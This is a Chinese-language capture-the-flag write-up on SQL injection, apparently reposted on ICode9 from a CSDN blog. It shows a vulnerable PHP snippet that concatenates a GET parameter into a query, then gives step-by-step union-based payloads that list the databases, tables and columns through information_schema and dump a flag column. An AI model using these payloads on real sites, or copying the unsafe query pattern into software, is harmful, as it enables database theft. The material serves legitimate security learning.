ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

SQL注入

2021-07-06 22:58:39  阅读:168  来源: 互联网

标签:union SQL table news schema select 注入


预备知识:

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。

常见的SQL注入漏洞关键代码如下:

$sql = "SELECT * FROM news WHERE id=";
$sql . = $_GET['id'];
$result = mysql_query($sql);

在这里插入图片描述

首页
在这里插入图片描述
搜索结果
在这里插入图片描述
加单引号报500错误
在这里插入图片描述可以看到报了sql语句错误
在这里插入图片描述看到了 % ,搜索型注入?

在这里插入图片描述
还可以看到用的是mysql数据库,下面好说了直接爆?

1、order by语句测试表中有几列

搜索%' order by 1 #

在这里插入图片描述
显示正常

order by 2的时候报错,
在这里插入图片描述

所以表中只有一列

2、union select 测试显示位

搜%' union select 1 #

在这里插入图片描述
正常回显

3、union联合查询爆数据库名

搜索%' union select database() #

在这里插入图片描述
4、爆表名

搜索%' union select group_concat(table_name) from information_schema.tables where table_schema='attackdb' #

在这里插入图片描述
5、爆db_news表的列名

0%' union select group_concat(column_name) from information_schema.columns where table_name='db_news' and table_schema='attackdb' #

在这里插入图片描述
看到了flag。。
6、爆flag

0%' union select flag from attackdb.db_news #

在这里插入图片描述

标签:union,SQL,table,news,schema,select,注入
来源: https://blog.csdn.net/pigzlfa/article/details/118531260

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有